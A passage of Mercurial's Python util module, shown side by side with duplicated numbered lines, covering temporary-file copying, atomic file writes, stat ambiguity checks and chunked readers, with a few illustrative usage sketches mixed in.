2268 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2268 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2269 found = contents.get(part)
2269 found = contents.get(part)
2270
2270
2271 result.append(found or part)
2271 result.append(found or part)
2272 dir = os.path.join(dir, part)
2272 dir = os.path.join(dir, part)
2273
2273
2274 return b''.join(result)
2274 return b''.join(result)
2275
2275
2276
2276
2277 def checknlink(testfile):
2277 def checknlink(testfile):
2278 # type: (bytes) -> bool
2278 # type: (bytes) -> bool
2279 '''check whether hardlink count reporting works properly'''
2279 '''check whether hardlink count reporting works properly'''
2280
2280
2281 # testfile may be open, so we need a separate file for checking to
2281 # testfile may be open, so we need a separate file for checking to
2282 # work around issue2543 (or testfile may get lost on Samba shares)
2282 # work around issue2543 (or testfile may get lost on Samba shares)
2283 f1, f2, fp = None, None, None
2283 f1, f2, fp = None, None, None
2284 try:
2284 try:
2285 fd, f1 = pycompat.mkstemp(
2285 fd, f1 = pycompat.mkstemp(
2286 prefix=b'.%s-' % os.path.basename(testfile),
2286 prefix=b'.%s-' % os.path.basename(testfile),
2287 suffix=b'1~',
2287 suffix=b'1~',
2288 dir=os.path.dirname(testfile),
2288 dir=os.path.dirname(testfile),
2289 )
2289 )
2290 os.close(fd)
2290 os.close(fd)
2291 f2 = b'%s2~' % f1[:-2]
2291 f2 = b'%s2~' % f1[:-2]
2292
2292
2293 oslink(f1, f2)
2293 oslink(f1, f2)
2294 # nlinks() may behave differently for files on Windows shares if
2294 # nlinks() may behave differently for files on Windows shares if
2295 # the file is open.
2295 # the file is open.
2296 fp = posixfile(f2)
2296 fp = posixfile(f2)
2297 return nlinks(f2) > 1
2297 return nlinks(f2) > 1
2298 except OSError:
2298 except OSError:
2299 return False
2299 return False
2300 finally:
2300 finally:
2301 if fp is not None:
2301 if fp is not None:
2302 fp.close()
2302 fp.close()
2303 for f in (f1, f2):
2303 for f in (f1, f2):
2304 try:
2304 try:
2305 if f is not None:
2305 if f is not None:
2306 os.unlink(f)
2306 os.unlink(f)
2307 except OSError:
2307 except OSError:
2308 pass
2308 pass
2309
2309
2310
2310
2311 def endswithsep(path):
2311 def endswithsep(path):
2312 # type: (bytes) -> bool
2312 # type: (bytes) -> bool
2313 '''Check path ends with os.sep or os.altsep.'''
2313 '''Check path ends with os.sep or os.altsep.'''
2314 return bool( # help pytype
2314 return bool( # help pytype
2315 path.endswith(pycompat.ossep)
2315 path.endswith(pycompat.ossep)
2316 or pycompat.osaltsep
2316 or pycompat.osaltsep
2317 and path.endswith(pycompat.osaltsep)
2317 and path.endswith(pycompat.osaltsep)
2318 )
2318 )
2319
2319
2320
2320
2321 def splitpath(path):
2321 def splitpath(path):
2322 # type: (bytes) -> List[bytes]
2322 # type: (bytes) -> List[bytes]
2323 """Split path by os.sep.
2323 """Split path by os.sep.
2324 Note that this function does not use os.altsep because this is
2324 Note that this function does not use os.altsep because this is
2325 an alternative to a simple "xxx.split(os.sep)".
2325 an alternative to a simple "xxx.split(os.sep)".
2326 It is recommended to use os.path.normpath() before using this
2326 It is recommended to use os.path.normpath() before using this
2327 function if needed."""
2327 function if needed."""
2328 return path.split(pycompat.ossep)
2328 return path.split(pycompat.ossep)
2329
2329
2330
2330
2331 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2331 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2332 """Create a temporary file with the same contents from name
2332 """Create a temporary file with the same contents from name
2333
2333
2334 The permission bits are copied from the original file.
2334 The permission bits are copied from the original file.
2335
2335
2336 If the temporary file is going to be truncated immediately, you
2336 If the temporary file is going to be truncated immediately, you
2337 can use emptyok=True as an optimization.
2337 can use emptyok=True as an optimization.
2338
2338
2339 Returns the name of the temporary file.
2339 Returns the name of the temporary file.
2340 """
2340 """
2341 d, fn = os.path.split(name)
2341 d, fn = os.path.split(name)
2342 fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
2342 fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
2343 os.close(fd)
2343 os.close(fd)
2344 # Temporary files are created with mode 0600, which is usually not
2344 # Temporary files are created with mode 0600, which is usually not
2345 # what we want. If the original file already exists, just copy
2345 # what we want. If the original file already exists, just copy
2346 # its mode. Otherwise, manually obey umask.
2346 # its mode. Otherwise, manually obey umask.
2347 copymode(name, temp, createmode, enforcewritable)
2347 copymode(name, temp, createmode, enforcewritable)
2348
2348
2349 if emptyok:
2349 if emptyok:
2350 return temp
2350 return temp
2351 try:
2351 try:
2352 try:
2352 try:
2353 ifp = posixfile(name, b"rb")
2353 ifp = posixfile(name, b"rb")
2354 except IOError as inst:
2354 except IOError as inst:
2355 if inst.errno == errno.ENOENT:
2355 if inst.errno == errno.ENOENT:
2356 return temp
2356 return temp
2357 if not getattr(inst, 'filename', None):
2357 if not getattr(inst, 'filename', None):
2358 inst.filename = name
2358 inst.filename = name
2359 raise
2359 raise
2360 ofp = posixfile(temp, b"wb")
2360 ofp = posixfile(temp, b"wb")
2361 for chunk in filechunkiter(ifp):
2361 for chunk in filechunkiter(ifp):
2362 ofp.write(chunk)
2362 ofp.write(chunk)
2363 ifp.close()
2363 ifp.close()
2364 ofp.close()
2364 ofp.close()
2365 except: # re-raises
2365 except: # re-raises
2366 try:
2366 try:
2367 os.unlink(temp)
2367 os.unlink(temp)
2368 except OSError:
2368 except OSError:
2369 pass
2369 pass
2370 raise
2370 raise
2371 return temp
2371 return temp
2372
2372
2373
2373
2374 class filestat(object):
2374 class filestat(object):
2375 """help to exactly detect change of a file
2375 """help to exactly detect change of a file
2376
2376
2377 The 'stat' attribute is the result of 'os.stat()' if the specified 'path'
2377 The 'stat' attribute is the result of 'os.stat()' if the specified 'path'
2378 exists. Otherwise, it is None. This saves callers of this class a
2378 exists. Otherwise, it is None. This saves callers of this class a
2379 preparatory 'exists()' check.
2379 preparatory 'exists()' check.
2380 """
2380 """
2381
2381
2382 def __init__(self, stat):
2382 def __init__(self, stat):
2383 self.stat = stat
2383 self.stat = stat
2384
2384
2385 @classmethod
2385 @classmethod
2386 def frompath(cls, path):
2386 def frompath(cls, path):
2387 try:
2387 try:
2388 stat = os.stat(path)
2388 stat = os.stat(path)
2389 except OSError as err:
2389 except OSError as err:
2390 if err.errno != errno.ENOENT:
2390 if err.errno != errno.ENOENT:
2391 raise
2391 raise
2392 stat = None
2392 stat = None
2393 return cls(stat)
2393 return cls(stat)
2394
2394
2395 @classmethod
2395 @classmethod
2396 def fromfp(cls, fp):
2396 def fromfp(cls, fp):
2397 stat = os.fstat(fp.fileno())
2397 stat = os.fstat(fp.fileno())
2398 return cls(stat)
2398 return cls(stat)
2399
2399
2400 __hash__ = object.__hash__
2400 __hash__ = object.__hash__
2401
2401
2402 def __eq__(self, old):
2402 def __eq__(self, old):
2403 try:
2403 try:
2404 # if ambiguity between stat of new and old file is
2404 # if ambiguity between stat of new and old file is
2405 # avoided, comparison of size, ctime and mtime is enough
2405 # avoided, comparison of size, ctime and mtime is enough
2406 # to exactly detect change of a file regardless of platform
2406 # to exactly detect change of a file regardless of platform
2407 return (
2407 return (
2408 self.stat.st_size == old.stat.st_size
2408 self.stat.st_size == old.stat.st_size
2409 and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2409 and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2410 and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
2410 and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
2411 )
2411 )
2412 except AttributeError:
2412 except AttributeError:
2413 pass
2413 pass
2414 try:
2414 try:
2415 return self.stat is None and old.stat is None
2415 return self.stat is None and old.stat is None
2416 except AttributeError:
2416 except AttributeError:
2417 return False
2417 return False
2418
2418
2419 def isambig(self, old):
2419 def isambig(self, old):
2420 """Examine whether new (= self) stat is ambiguous against old one
2420 """Examine whether new (= self) stat is ambiguous against old one
2421
2421
2422 "S[N]" below means stat of a file at N-th change:
2422 "S[N]" below means stat of a file at N-th change:
2423
2423
2424 - S[n-1].ctime < S[n].ctime: can detect change of a file
2424 - S[n-1].ctime < S[n].ctime: can detect change of a file
2425 - S[n-1].ctime == S[n].ctime
2425 - S[n-1].ctime == S[n].ctime
2426 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2426 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2427 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2427 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2428 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2428 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2429 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2429 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2430
2430
2431 Case (*2) above means that a file was changed twice or more within
2431 Case (*2) above means that a file was changed twice or more within
2432 the same second (= S[n-1].ctime), so comparing these timestamps
2432 the same second (= S[n-1].ctime), so comparing these timestamps
2433 is ambiguous.
2433 is ambiguous.
2434
2434
2435 The basic idea for avoiding such ambiguity is "advance mtime by 1
2435 The basic idea for avoiding such ambiguity is "advance mtime by 1
2436 second, if the timestamp is ambiguous".
2436 second, if the timestamp is ambiguous".
2437
2437
2438 But advancing mtime only in case (*2) doesn't work as
2438 But advancing mtime only in case (*2) doesn't work as
2439 expected, because naturally advanced S[n].mtime in case (*1)
2439 expected, because naturally advanced S[n].mtime in case (*1)
2440 might be equal to manually advanced S[n-1 or earlier].mtime.
2440 might be equal to manually advanced S[n-1 or earlier].mtime.
2441
2441
2442 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2442 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2443 treated as ambiguous regardless of mtime, so that a change is not
2443 treated as ambiguous regardless of mtime, so that a change is not
2444 overlooked because such mtime values collide.
2444 overlooked because such mtime values collide.
2445
2445
2446 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2446 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2447 S[n].mtime", even if size of a file isn't changed.
2447 S[n].mtime", even if size of a file isn't changed.
2448 """
2448 """
2449 try:
2449 try:
2450 return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2450 return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2451 except AttributeError:
2451 except AttributeError:
2452 return False
2452 return False
2453
2453
2454 def avoidambig(self, path, old):
2454 def avoidambig(self, path, old):
2455 """Change file stat of specified path to avoid ambiguity
2455 """Change file stat of specified path to avoid ambiguity
2456
2456
2457 'old' should be previous filestat of 'path'.
2457 'old' should be previous filestat of 'path'.
2458
2458
2459 Avoiding ambiguity is skipped if the process doesn't have
2459 Avoiding ambiguity is skipped if the process doesn't have
2460 appropriate privileges for 'path'; in that case this returns
2460 appropriate privileges for 'path'; in that case this returns
2461 False.
2461 False.
2462
2462
2463 Otherwise, this returns True, as "ambiguity is avoided".
2463 Otherwise, this returns True, as "ambiguity is avoided".
2464 """
2464 """
2465 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2465 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2466 try:
2466 try:
2467 os.utime(path, (advanced, advanced))
2467 os.utime(path, (advanced, advanced))
2468 except OSError as inst:
2468 except OSError as inst:
2469 if inst.errno == errno.EPERM:
2469 if inst.errno == errno.EPERM:
2470 # utime() on the file created by another user causes EPERM,
2470 # utime() on the file created by another user causes EPERM,
2471 # if a process doesn't have appropriate privileges
2471 # if a process doesn't have appropriate privileges
2472 return False
2472 return False
2473 raise
2473 raise
2474 return True
2474 return True
2475
2475
2476 def __ne__(self, other):
2476 def __ne__(self, other):
2477 return not self == other
2477 return not self == other
2478
2478
2479
2479
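A minimal usage sketch (illustrative, not part of the module): capture the stat of a file before rewriting it, then let avoidambig() nudge mtime forward when the new stat would be ambiguous with the old one. The b'some-file' path is a placeholder.

path = b'some-file'                      # placeholder path
oldstat = filestat.frompath(path)        # stat before the rewrite (or None)
with open(path, 'wb') as fp:
    fp.write(b'new content')
newstat = filestat.frompath(path)
if oldstat.stat and newstat.isambig(oldstat):
    # same ctime as before: advance mtime so later size/ctime/mtime
    # comparisons can still see that the file changed
    newstat.avoidambig(path, oldstat)
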
2480 class atomictempfile(object):
2480 class atomictempfile(object):
2481 """writable file object that atomically updates a file
2481 """writable file object that atomically updates a file
2482
2482
2483 All writes will go to a temporary copy of the original file. Call
2483 All writes will go to a temporary copy of the original file. Call
2484 close() when you are done writing, and atomictempfile will rename
2484 close() when you are done writing, and atomictempfile will rename
2485 the temporary copy to the original name, making the changes
2485 the temporary copy to the original name, making the changes
2486 visible. If the object is destroyed without being closed, all your
2486 visible. If the object is destroyed without being closed, all your
2487 writes are discarded.
2487 writes are discarded.
2488
2488
2489 The 'checkambig' argument of the constructor is used together with
2489 The 'checkambig' argument of the constructor is used together with
2490 filestat, and is useful only if the target file is guarded by a
2490 filestat, and is useful only if the target file is guarded by a
2491 lock (e.g. repo.lock or repo.wlock).
2491 lock (e.g. repo.lock or repo.wlock).
2492 """
2492 """
2493
2493
2494 def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
2494 def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
2495 self.__name = name # permanent name
2495 self.__name = name # permanent name
2496 self._tempname = mktempcopy(
2496 self._tempname = mktempcopy(
2497 name,
2497 name,
2498 emptyok=(b'w' in mode),
2498 emptyok=(b'w' in mode),
2499 createmode=createmode,
2499 createmode=createmode,
2500 enforcewritable=(b'w' in mode),
2500 enforcewritable=(b'w' in mode),
2501 )
2501 )
2502
2502
2503 self._fp = posixfile(self._tempname, mode)
2503 self._fp = posixfile(self._tempname, mode)
2504 self._checkambig = checkambig
2504 self._checkambig = checkambig
2505
2505
2506 # delegated methods
2506 # delegated methods
2507 self.read = self._fp.read
2507 self.read = self._fp.read
2508 self.write = self._fp.write
2508 self.write = self._fp.write
2509 self.seek = self._fp.seek
2509 self.seek = self._fp.seek
2510 self.tell = self._fp.tell
2510 self.tell = self._fp.tell
2511 self.fileno = self._fp.fileno
2511 self.fileno = self._fp.fileno
2512
2512
2513 def close(self):
2513 def close(self):
2514 if not self._fp.closed:
2514 if not self._fp.closed:
2515 self._fp.close()
2515 self._fp.close()
2516 filename = localpath(self.__name)
2516 filename = localpath(self.__name)
2517 oldstat = self._checkambig and filestat.frompath(filename)
2517 oldstat = self._checkambig and filestat.frompath(filename)
2518 if oldstat and oldstat.stat:
2518 if oldstat and oldstat.stat:
2519 rename(self._tempname, filename)
2519 rename(self._tempname, filename)
2520 newstat = filestat.frompath(filename)
2520 newstat = filestat.frompath(filename)
2521 if newstat.isambig(oldstat):
2521 if newstat.isambig(oldstat):
2522 # stat of changed file is ambiguous to original one
2522 # stat of changed file is ambiguous to original one
2523 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2523 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2524 os.utime(filename, (advanced, advanced))
2524 os.utime(filename, (advanced, advanced))
2525 else:
2525 else:
2526 rename(self._tempname, filename)
2526 rename(self._tempname, filename)
2527
2527
2528 def discard(self):
2528 def discard(self):
2529 if not self._fp.closed:
2529 if not self._fp.closed:
2530 try:
2530 try:
2531 os.unlink(self._tempname)
2531 os.unlink(self._tempname)
2532 except OSError:
2532 except OSError:
2533 pass
2533 pass
2534 self._fp.close()
2534 self._fp.close()
2535
2535
2536 def __del__(self):
2536 def __del__(self):
2537 if safehasattr(self, '_fp'): # constructor actually did something
2537 if safehasattr(self, '_fp'): # constructor actually did something
2538 self.discard()
2538 self.discard()
2539
2539
2540 def __enter__(self):
2540 def __enter__(self):
2541 return self
2541 return self
2542
2542
2543 def __exit__(self, exctype, excvalue, traceback):
2543 def __exit__(self, exctype, excvalue, traceback):
2544 if exctype is not None:
2544 if exctype is not None:
2545 self.discard()
2545 self.discard()
2546 else:
2546 else:
2547 self.close()
2547 self.close()
2548
2548
2549
2549
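A small usage sketch (assumed, not from the module) of atomictempfile as a context manager; b'config-file' is a placeholder target name.

with atomictempfile(b'config-file', checkambig=True) as fp:
    fp.write(b'[section]\n')
    fp.write(b'key = value\n')
# on a clean exit the temporary file has been renamed over b'config-file';
# if the block had raised, discard() would have dropped the temp file instead
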
2550 def unlinkpath(f, ignoremissing=False, rmdir=True):
2550 def unlinkpath(f, ignoremissing=False, rmdir=True):
2551 # type: (bytes, bool, bool) -> None
2551 # type: (bytes, bool, bool) -> None
2552 """unlink and remove the directory if it is empty"""
2552 """unlink and remove the directory if it is empty"""
2553 if ignoremissing:
2553 if ignoremissing:
2554 tryunlink(f)
2554 tryunlink(f)
2555 else:
2555 else:
2556 unlink(f)
2556 unlink(f)
2557 if rmdir:
2557 if rmdir:
2558 # try removing directories that might now be empty
2558 # try removing directories that might now be empty
2559 try:
2559 try:
2560 removedirs(os.path.dirname(f))
2560 removedirs(os.path.dirname(f))
2561 except OSError:
2561 except OSError:
2562 pass
2562 pass
2563
2563
2564
2564
2565 def tryunlink(f):
2565 def tryunlink(f):
2566 # type: (bytes) -> None
2566 # type: (bytes) -> None
2567 """Attempt to remove a file, ignoring ENOENT errors."""
2567 """Attempt to remove a file, ignoring ENOENT errors."""
2568 try:
2568 try:
2569 unlink(f)
2569 unlink(f)
2570 except OSError as e:
2570 except OSError as e:
2571 if e.errno != errno.ENOENT:
2571 if e.errno != errno.ENOENT:
2572 raise
2572 raise
2573
2573
2574
2574
2575 def makedirs(name, mode=None, notindexed=False):
2575 def makedirs(name, mode=None, notindexed=False):
2576 # type: (bytes, Optional[int], bool) -> None
2576 # type: (bytes, Optional[int], bool) -> None
2577 """recursive directory creation with parent mode inheritance
2577 """recursive directory creation with parent mode inheritance
2578
2578
2579 Newly created directories are marked as "not to be indexed by
2579 Newly created directories are marked as "not to be indexed by
2580 the content indexing service", if ``notindexed`` is specified
2580 the content indexing service", if ``notindexed`` is specified
2581 for "write" mode access.
2581 for "write" mode access.
2582 """
2582 """
2583 try:
2583 try:
2584 makedir(name, notindexed)
2584 makedir(name, notindexed)
2585 except OSError as err:
2585 except OSError as err:
2586 if err.errno == errno.EEXIST:
2586 if err.errno == errno.EEXIST:
2587 return
2587 return
2588 if err.errno != errno.ENOENT or not name:
2588 if err.errno != errno.ENOENT or not name:
2589 raise
2589 raise
2590 parent = os.path.dirname(os.path.abspath(name))
2590 parent = os.path.dirname(os.path.abspath(name))
2591 if parent == name:
2591 if parent == name:
2592 raise
2592 raise
2593 makedirs(parent, mode, notindexed)
2593 makedirs(parent, mode, notindexed)
2594 try:
2594 try:
2595 makedir(name, notindexed)
2595 makedir(name, notindexed)
2596 except OSError as err:
2596 except OSError as err:
2597 # Catch EEXIST to handle races
2597 # Catch EEXIST to handle races
2598 if err.errno == errno.EEXIST:
2598 if err.errno == errno.EEXIST:
2599 return
2599 return
2600 raise
2600 raise
2601 if mode is not None:
2601 if mode is not None:
2602 os.chmod(name, mode)
2602 os.chmod(name, mode)
2603
2603
2604
2604
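A quick sketch of makedirs(); the path is a placeholder and the mode is optional.

# create any missing parents; newly created directories are chmod'd to the
# requested mode, while a pre-existing leaf directory is left untouched
makedirs(b'build/output/logs', mode=0o755)
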
2605 def readfile(path):
2605 def readfile(path):
2606 # type: (bytes) -> bytes
2606 # type: (bytes) -> bytes
2607 with open(path, b'rb') as fp:
2607 with open(path, b'rb') as fp:
2608 return fp.read()
2608 return fp.read()
2609
2609
2610
2610
2611 def writefile(path, text):
2611 def writefile(path, text):
2612 # type: (bytes, bytes) -> None
2612 # type: (bytes, bytes) -> None
2613 with open(path, b'wb') as fp:
2613 with open(path, b'wb') as fp:
2614 fp.write(text)
2614 fp.write(text)
2615
2615
2616
2616
2617 def appendfile(path, text):
2617 def appendfile(path, text):
2618 # type: (bytes, bytes) -> None
2618 # type: (bytes, bytes) -> None
2619 with open(path, b'ab') as fp:
2619 with open(path, b'ab') as fp:
2620 fp.write(text)
2620 fp.write(text)
2621
2621
2622
2622
2623 class chunkbuffer(object):
2623 class chunkbuffer(object):
2624 """Allow arbitrarily sized chunks of data to be efficiently read from an
2624 """Allow arbitrarily sized chunks of data to be efficiently read from an
2625 iterator over chunks of arbitrary size."""
2625 iterator over chunks of arbitrary size."""
2626
2626
2627 def __init__(self, in_iter):
2627 def __init__(self, in_iter):
2628 """in_iter is the iterator that's iterating over the input chunks."""
2628 """in_iter is the iterator that's iterating over the input chunks."""
2629
2629
2630 def splitbig(chunks):
2630 def splitbig(chunks):
2631 for chunk in chunks:
2631 for chunk in chunks:
2632 if len(chunk) > 2 ** 20:
2632 if len(chunk) > 2 ** 20:
2633 pos = 0
2633 pos = 0
2634 while pos < len(chunk):
2634 while pos < len(chunk):
2635 end = pos + 2 ** 18
2635 end = pos + 2 ** 18
2636 yield chunk[pos:end]
2636 yield chunk[pos:end]
2637 pos = end
2637 pos = end
2638 else:
2638 else:
2639 yield chunk
2639 yield chunk
2640
2640
2641 self.iter = splitbig(in_iter)
2641 self.iter = splitbig(in_iter)
2642 self._queue = collections.deque()
2642 self._queue = collections.deque()
2643 self._chunkoffset = 0
2643 self._chunkoffset = 0
2644
2644
2645 def read(self, l=None):
2645 def read(self, l=None):
2646 """Read up to 'l' bytes of data from the iterator of chunks.
2646 """Read up to 'l' bytes of data from the iterator of chunks.
2647 Returns less than 'l' bytes if the iterator runs dry.
2647 Returns less than 'l' bytes if the iterator runs dry.
2648
2648
2649 If the size parameter is omitted, read everything."""
2649 If the size parameter is omitted, read everything."""
2650 if l is None:
2650 if l is None:
2651 return b''.join(self.iter)
2651 return b''.join(self.iter)
2652
2652
2653 left = l
2653 left = l
2654 buf = []
2654 buf = []
2655 queue = self._queue
2655 queue = self._queue
2656 while left > 0:
2656 while left > 0:
2657 # refill the queue
2657 # refill the queue
2658 if not queue:
2658 if not queue:
2659 target = 2 ** 18
2659 target = 2 ** 18
2660 for chunk in self.iter:
2660 for chunk in self.iter:
2661 queue.append(chunk)
2661 queue.append(chunk)
2662 target -= len(chunk)
2662 target -= len(chunk)
2663 if target <= 0:
2663 if target <= 0:
2664 break
2664 break
2665 if not queue:
2665 if not queue:
2666 break
2666 break
2667
2667
2668 # The easy way to do this would be to queue.popleft(), modify the
2668 # The easy way to do this would be to queue.popleft(), modify the
2669 # chunk (if necessary), then queue.appendleft(). However, for cases
2669 # chunk (if necessary), then queue.appendleft(). However, for cases
2670 # where we read partial chunk content, this incurs 2 dequeue
2670 # where we read partial chunk content, this incurs 2 dequeue
2671 # mutations and creates a new str for the remaining chunk in the
2671 # mutations and creates a new str for the remaining chunk in the
2672 # queue. Our code below avoids this overhead.
2672 # queue. Our code below avoids this overhead.
2673
2673
2674 chunk = queue[0]
2674 chunk = queue[0]
2675 chunkl = len(chunk)
2675 chunkl = len(chunk)
2676 offset = self._chunkoffset
2676 offset = self._chunkoffset
2677
2677
2678 # Use full chunk.
2678 # Use full chunk.
2679 if offset == 0 and left >= chunkl:
2679 if offset == 0 and left >= chunkl:
2680 left -= chunkl
2680 left -= chunkl
2681 queue.popleft()
2681 queue.popleft()
2682 buf.append(chunk)
2682 buf.append(chunk)
2683 # self._chunkoffset remains at 0.
2683 # self._chunkoffset remains at 0.
2684 continue
2684 continue
2685
2685
2686 chunkremaining = chunkl - offset
2686 chunkremaining = chunkl - offset
2687
2687
2688 # Use all of unconsumed part of chunk.
2688 # Use all of unconsumed part of chunk.
2689 if left >= chunkremaining:
2689 if left >= chunkremaining:
2690 left -= chunkremaining
2690 left -= chunkremaining
2691 queue.popleft()
2691 queue.popleft()
2692 # offset == 0 is enabled by block above, so this won't merely
2692 # offset == 0 is enabled by block above, so this won't merely
2693 # copy via ``chunk[0:]``.
2693 # copy via ``chunk[0:]``.
2694 buf.append(chunk[offset:])
2694 buf.append(chunk[offset:])
2695 self._chunkoffset = 0
2695 self._chunkoffset = 0
2696
2696
2697 # Partial chunk needed.
2697 # Partial chunk needed.
2698 else:
2698 else:
2699 buf.append(chunk[offset : offset + left])
2699 buf.append(chunk[offset : offset + left])
2700 self._chunkoffset += left
2700 self._chunkoffset += left
2701 left -= chunkremaining
2701 left -= chunkremaining
2702
2702
2703 return b''.join(buf)
2703 return b''.join(buf)
2704
2704
2705
2705
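An illustrative sketch of chunkbuffer re-slicing an iterator of unevenly sized chunks into fixed-size reads:

buf = chunkbuffer(iter([b'ab', b'cdef', b'g']))
assert buf.read(3) == b'abc'    # spans the first two input chunks
assert buf.read(3) == b'def'    # continues inside the second chunk
assert buf.read(3) == b'g'      # short read: the source is nearly exhausted
assert buf.read(3) == b''       # fully drained
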
2706 def filechunkiter(f, size=131072, limit=None):
2706 def filechunkiter(f, size=131072, limit=None):
2707 """Create a generator that yields the data in the file in chunks of
2707 """Create a generator that yields the data in the file in chunks of
2708 'size' (default 131072) bytes at a time, up to an optional 'limit'
2708 'size' (default 131072) bytes at a time, up to an optional 'limit'
2709 (default is to read all data). Chunks may be less than 'size' bytes
2709 (default is to read all data). Chunks may be less than 'size' bytes
2710 if the chunk is the last chunk in the file, or if the file is a
2710 if the chunk is the last chunk in the file, or if the file is a
2711 socket or some other type of file that sometimes returns less data
2711 socket or some other type of file that sometimes returns less data
2712 than is requested."""
2712 than is requested."""
2713 assert size >= 0
2713 assert size >= 0
2714 assert limit is None or limit >= 0
2714 assert limit is None or limit >= 0
2715 while True:
2715 while True:
2716 if limit is None:
2716 if limit is None:
2717 nbytes = size
2717 nbytes = size
2718 else:
2718 else:
2719 nbytes = min(limit, size)
2719 nbytes = min(limit, size)
2720 s = nbytes and f.read(nbytes)
2720 s = nbytes and f.read(nbytes)
2721 if not s:
2721 if not s:
2722 break
2722 break
2723 if limit:
2723 if limit:
2724 limit -= len(s)
2724 limit -= len(s)
2725 yield s
2725 yield s
2726
2726
2727
2727
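A sketch of filechunkiter() over an in-memory file object; io.BytesIO stands in for a real file handle.

import io

fh = io.BytesIO(b'abcdefghij')
# read in 4-byte chunks, but stop after at most 6 bytes in total
assert list(filechunkiter(fh, size=4, limit=6)) == [b'abcd', b'ef']
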
2728 class cappedreader(object):
2728 class cappedreader(object):
2729 """A file object proxy that allows reading up to N bytes.
2729 """A file object proxy that allows reading up to N bytes.
2730
2730
2731 Given a source file object, instances of this type allow reading up to
2731 Given a source file object, instances of this type allow reading up to
2732 N bytes from that source file object. Attempts to read past the allowed
2732 N bytes from that source file object. Attempts to read past the allowed
2733 limit are treated as EOF.
2733 limit are treated as EOF.
2734
2734
2735 It is assumed that I/O is not performed on the original file object
2735 It is assumed that I/O is not performed on the original file object
2736 in addition to I/O that is performed by this instance. If there is,
2736 in addition to I/O that is performed by this instance. If there is,
2737 state tracking will get out of sync and unexpected results will ensue.
2737 state tracking will get out of sync and unexpected results will ensue.
2738 """
2738 """
2739
2739
2740 def __init__(self, fh, limit):
2740 def __init__(self, fh, limit):
2741 """Allow reading up to <limit> bytes from <fh>."""
2741 """Allow reading up to <limit> bytes from <fh>."""
2742 self._fh = fh
2742 self._fh = fh
2743 self._left = limit
2743 self._left = limit
2744
2744
2745 def read(self, n=-1):
2745 def read(self, n=-1):
2746 if not self._left:
2746 if not self._left:
2747 return b''
2747 return b''
2748
2748
2749 if n < 0:
2749 if n < 0:
2750 n = self._left
2750 n = self._left
2751
2751
2752 data = self._fh.read(min(n, self._left))
2752 data = self._fh.read(min(n, self._left))
2753 self._left -= len(data)
2753 self._left -= len(data)
2754 assert self._left >= 0
2754 assert self._left >= 0
2755
2755
2756 return data
2756 return data
2757
2757
2758 def readinto(self, b):
2758 def readinto(self, b):
2759 res = self.read(len(b))
2759 res = self.read(len(b))
2760 if res is None:
2760 if res is None:
2761 return None
2761 return None
2762
2762
2763 b[0 : len(res)] = res
2763 b[0 : len(res)] = res
2764 return len(res)
2764 return len(res)
2765
2765
2766
2766
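A sketch of cappedreader limiting how much of an underlying file object can be read; io.BytesIO is again a stand-in source.

import io

src = io.BytesIO(b'0123456789')
capped = cappedreader(src, 4)
assert capped.read() == b'0123'    # at most 4 bytes are ever exposed
assert capped.read() == b''        # further reads behave like EOF
assert src.read() == b'456789'     # the underlying object keeps the rest
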
2767 def unitcountfn(*unittable):
2767 def unitcountfn(*unittable):
2768 '''return a function that renders a readable count of some quantity'''
2768 '''return a function that renders a readable count of some quantity'''
2769
2769
2770 def go(count):
2770 def go(count):
2771 for multiplier, divisor, format in unittable:
2771 for multiplier, divisor, format in unittable:
2772 if abs(count) >= divisor * multiplier:
2772 if abs(count) >= divisor * multiplier:
2773 return format % (count / float(divisor))
2773 return format % (count / float(divisor))
2774 return unittable[-1][2] % count
2774 return unittable[-1][2] % count
2775
2775
2776 return go
2776 return go
2777
2777
2778
2778
2779 def processlinerange(fromline, toline):
2779 def processlinerange(fromline, toline):
2780 # type: (int, int) -> Tuple[int, int]
2780 # type: (int, int) -> Tuple[int, int]
2781 """Check that linerange <fromline>:<toline> makes sense and return a
2781 """Check that linerange <fromline>:<toline> makes sense and return a
2782 0-based range.
2782 0-based range.
2783
2783
2784 >>> processlinerange(10, 20)
2784 >>> processlinerange(10, 20)
2785 (9, 20)
2785 (9, 20)
2786 >>> processlinerange(2, 1)
2786 >>> processlinerange(2, 1)
2787 Traceback (most recent call last):
2787 Traceback (most recent call last):
2788 ...
2788 ...
2789 ParseError: line range must be positive
2789 ParseError: line range must be positive
2790 >>> processlinerange(0, 5)
2790 >>> processlinerange(0, 5)
2791 Traceback (most recent call last):
2791 Traceback (most recent call last):
2792 ...
2792 ...
2793 ParseError: fromline must be strictly positive
2793 ParseError: fromline must be strictly positive
2794 """
2794 """
2795 if toline - fromline < 0:
2795 if toline - fromline < 0:
